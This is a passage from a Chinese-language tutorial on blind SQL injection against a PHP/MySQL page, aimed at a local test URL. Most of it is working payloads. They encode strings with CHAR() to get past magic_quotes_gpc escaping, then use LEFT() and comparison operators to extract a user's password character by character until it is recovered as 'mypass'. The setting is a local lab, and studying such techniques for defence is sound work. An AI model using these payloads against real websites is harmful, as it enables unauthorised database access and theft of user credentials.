绝对错误,因为mypass是字符串,除非提交:
|
http://127.0.0.1/injection/user.php?userid=1 and password='mypass' |
由于magic_quotes_gpc打开的关系,这个是绝对不可能的。引号会变成/',我们有什么办法可以把这些字符串变成整形数据吗?就是用CHAR()函数,如果我们提交:
|
http://127.0.0.1/injection/user.php?userid=1 and password=char(109,121,112,97,115,115) |
正常返回,实践证明,我们用CHAR()是可行的,我们就把CHAR()用进LEFT函数里面逐位猜解!
|
http://127.0.0.1/injection/user.php?userid=1 and LEFT(password,1)=char(109) |
正常返回,说明userid为1的用户,password字段第一位是char(109),我们继续猜:
|
http://127.0.0.1/injection/user.php?userid=1 and LEFT(password,2)=char(109,121) |
又正常返回,说明正确,但这样影响到效率,既然是整形,我们完全可以用比较运算符来比较:
|
http://127.0.0.1/injection/user.php?userid=1 and LEFT(password,1)>char(100) |
然后适当调整char()里面的数字来确定一个范围,很快就可以猜出来,到了后面的时候,还是可以用比较运算符来比较:
|
http://127.0.0.1/injection/user.php?userid=1 and LEFT(password,3)>char(109,121,111) |
而原来已经猜好的不用改变了,很快就可以猜完:
|
http://127.0.0.1/injection/user.php?userid=1 and LEFT(password,6)=char(109,121,112,97,115,115) |
然后在mysql>命令提示符下或者在phpMyadmin里面执行:
|
select char(109,121,112,97,115,115) |
就会返回:mypass
